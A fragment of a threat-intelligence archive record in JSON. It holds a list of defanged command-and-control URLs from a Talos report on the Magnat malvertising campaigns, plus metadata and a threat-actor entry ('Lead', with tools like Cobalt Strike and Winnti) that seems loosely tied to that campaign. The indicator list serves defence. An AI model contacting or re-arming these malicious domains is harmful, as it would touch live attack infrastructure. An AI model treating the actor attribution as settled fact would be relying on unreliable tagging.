o[.]site/index.php\r\nhttp://paydoor[.]space/index.php\r\nhttp://430lodsposlok[.]online/index.php\r\nhttp://linkonbak[.]site/index.php\r\nhttp://430lodsposlok[.]site/index.php\r\nhttp://dontbeburrow[.]space/index.php\r\nhttp://430lodsposlok[.]monster/index.php\r\nhttp://430lodsposlok[.]store/index.php\r\nhttp://luckydaddy[.]club/index.php\r\nhttp://metropolibit[.]monster/index.php\r\nhttp://inpriorityfit[.]site/index.php\r\nhttp://maskofmistery[.]icu/index.php\r\nSource: https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html"
	],
	"report_names": [
		"magnat-campaigns-use-malvertising-to.html"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439066,
	"ts_updated_at": 1775791231,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/84b5cc7e827f2dba7a877290d4bf60858303a3d4.pdf",
		"text": "https://archive.orkl.eu/84b5cc7e827f2dba7a877290d4bf60858303a3d4.txt",
		"img": "https://archive.orkl.eu/84b5cc7e827f2dba7a877290d4bf60858303a3d4.jpg"
	}
}